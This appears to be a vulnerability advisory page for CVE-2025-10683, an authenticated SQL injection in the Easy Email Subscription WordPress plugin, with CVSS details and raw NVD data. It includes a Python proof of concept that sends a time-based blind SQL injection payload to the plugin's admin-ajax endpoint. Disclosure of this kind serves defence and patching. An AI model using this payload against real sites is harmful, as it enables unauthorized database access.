Security Vulnerability Report
中文
CVE-2025-10683 CVSS 4.9 MEDIUM

CVE-2025-10683

Published: 2025-11-06 03:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Easy Email Subscription plugin for WordPress is vulnerable to SQL Injection via the 'uid' parameter in all versions up to, and including, 1.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Easy Email Subscription plugin for WordPress <= 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10683 SQL Injection PoC # Target: WordPress with Easy Email Subscription plugin <= 1.3 # Authentication: Requires Administrator-level access import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-wordpress-site.com" COOKIES = { "wordpress_logged_in_xxx": "admin_session_token" } def exploit_sql_injection(): """Extract database user using SQL injection via uid parameter""" # Malicious payload to extract current database user payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" params = { "action": "easy_email_subscription_verify", "uid": payload } print(f"[*] Sending SQL injection payload to uid parameter...") print(f"[*] Payload: {payload}") try: response = requests.get( endpoint, params=params, cookies=COOKIES, timeout=10 ) print(f"[*] Response status: {response.status_code}") print(f"[*] Response time: {response.elapsed.total_seconds()}s") except requests.exceptions.Timeout: print("[!] Request timed out - possible SQL injection vulnerability") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": print("CVE-2025-10683 SQL Injection PoC") print("=" * 50) exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10683", "sourceIdentifier": "[email protected]", "published": "2025-11-06T03:15:34.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Email Subscription plugin for WordPress is vulnerable to SQL Injection via the 'uid' parameter in all versions up to, and including, 1.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3388578/email-subscription-with-secure-captcha", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2353d9d-d5ae-4470-9c0f-119acecd6686?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.